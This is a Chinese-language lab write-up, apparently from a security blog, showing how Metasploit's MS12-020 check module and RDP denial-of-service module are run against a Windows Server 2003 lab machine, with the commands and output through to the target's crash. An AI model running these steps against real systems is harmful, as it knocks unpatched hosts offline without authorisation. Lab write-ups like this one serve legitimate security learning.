使用metasploit(MSF)对windows的ms12-020漏洞进行利用的过程

前言
攻击者向受影响的系统发送一系列特制 RDP 数据包，则这个漏洞可能造成拒绝服务攻击或允许远程执行代码。默认情况下，任何 Windows 操作系统都未启用远程桌面协议 (RDP，默认端口3389)。没有启用 RDP 的系统不受威胁。此实验对目标系统造成了DOS攻击。

0x01 实验环境
攻击机：kali linux
ip:192.168.8.130
目标机：windows server 2003 Enterprise x64 SP2
ip:192.168.8.129

0x02 漏洞验证
使用msf的模块：auxiliary/scanner/rdp/ms12_020_check验证目标机是否具有此漏洞

msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.8.129
msf auxiliary(ms12_020_check) > info

Name: MS12-020 Microsoft Remote Desktop Checker
Module: auxiliary/scanner/rdp/ms12_020_check
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
Royce Davis "R3dy" <rdavis@accuvant.com>
Brandon McCann "zeknox" <bmccann@accuvant.com>

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.8.129 yes The target address range or CIDR identifier
RPORT 3389 yes Remote port running RDP (TCP)
THREADS 100 yes The number of concurrent threads

Description:
This module checks a range of hosts for the MS12-020 vulnerability.
This does not cause a DoS on the target.

References:
https://cvedetails.com/cve/CVE-2012-0002/
https://technet.microsoft.com/en-us/library/security/MS12-020
http://technet.microsoft.com/en-us/security/bulletin/ms12-020
https://www.exploit-db.com/exploits/18606
https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse

运行后显示目标系统具有此漏洞：

msf auxiliary(ms12_020_check) > run

[+] 192.168.8.129:3389 - 192.168.8.129:3389 - The target is vulnerable.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

0x03 漏洞利用
msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.8.129 yes The target address
RPORT 3389 yes The target port (TCP)
msf auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - 210 bytes sent
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Checking RDP status...
[+] 192.168.8.129:3389 - 192.168.8.129:3389 seems down
[*] Auxiliary module execution completed

运行模块后，目标系统windows server 2003 蓝屏宕机：

您可能感兴趣的文章

• [转载]利用分块传输绕过WAF进行SQL注入
• “Janus” 安卓系统签名漏洞(CVE-2017-13156)
• ZyXEL ZyWALL Quagga及Zebra进程默认帐号口令漏洞【原理扫描】
• 一套实用的渗透测试岗位面试题
• JetBrains idea项目目录泄露
• 给Android7及以上的手机安装系统级证书，实现Fiddler或者其他程序的HTTPS的抓包